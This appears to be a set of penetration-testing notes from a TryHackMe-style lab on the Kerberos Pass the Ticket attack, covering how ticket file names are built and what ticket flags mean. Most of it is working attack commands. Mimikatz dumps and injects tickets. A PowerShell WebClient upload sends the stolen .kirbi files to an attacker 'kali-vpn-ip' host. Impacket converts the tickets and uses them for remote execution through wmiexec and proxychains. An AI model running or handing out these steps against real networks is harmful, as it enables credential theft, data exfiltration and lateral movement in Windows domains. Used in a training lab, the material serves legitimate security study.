Skip to main content

Pass the Ticket

Anatomy of a Kerberos Ticket

|_______| ^ |________| |_____________| |_____________________||_____|
    |     |     |              |                   |             |______file extension
    |     |     |              |                   |
    |     |     |              |                   |______resource
    |     |     |              |
    |     |     |              |______user/computer account (ticket owner)
    |     |     |
    |     |     |______0x40e10000 kerberos flag [1]
    |     |
    |     |______kerberos ticket type
    |            0 = TGS / 1 = Client ticket / 2 = TGT
    |__________0x97d82 user LUID [2]

[1] Example output from running "klist" on a Windows host

0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize

[2] Each logon session has a locally-unique identifier (LUID). A LUID is a system-generated 64-bit value guaranteed to be unique during a single boot session on the system on which it was generated. Some LUIDs are predefined. For example, the LUID for the System account’s logon session is always 0x3e7 (999 decimal), the LUID for Network Service’s session is 0x3e4 (996), and Local Service’s is 0x3e5 (997). Most other LUIDs are randomly generated.

Pass the Ticket

In general, a Ticket-Granting-Ticket (TGT) ticket is going to grant us more mileage than a Ticket-Granting-Service (TGS) ticket. A TGT will allow us to request new TGS tickets to any service as a specific user. Whereas, a TGS will only allow us to re-authorize us to a single service the user has previously requested.


Dump Cached Tickets

mimikatz # sekurlsa::tickets /export

Valid TGT


Mimikatz PTT

kerberos::ptt [0;ca99f8]-2-0-40e10000-t1_toby.beck@krbtgt-ZA.TRYHACKME.COM.kirbi


Transfer Dumped Tickets to Attack Box

Take the dumped tickets shown above and zip them up. Transfer the .zip file to your attack box.

# Add all the tickets a .zip archive
Compress-Archive -Path .\*.kirbi -DestinationPath

# Send the .zip archive to Kali
# UploadFile method reqires two arguments
	# URI
    # Absolute path to file
$webClient = New-Object System.Net.WebClient
$webClient.UploadFile('http://kali-vpn-ip/upload.php', "$PWD\")

Convert and Pass the Tickets on Attack Box

# Convert the TGT to Linux format
impacket-ticketConverter \[0\;ca99f8\]-2-0-40e10000-t1_toby.beck@krbtgt-ZA.TRYHACKME.COM.kirbi t1_toby.beck.ccache

# Set an environment variable for Impacket
export KRB5CCNAME=t1_toby.beck.ccache

# Using wmiexec here as an example
impacket-wmiexec -k -no-pass

# Same command above but passing through a SOCKS proxy
# Set your SOCKS proxy in /etc/proxychains4.conf
proxychains -q impacket-wmiexec -k -no-pass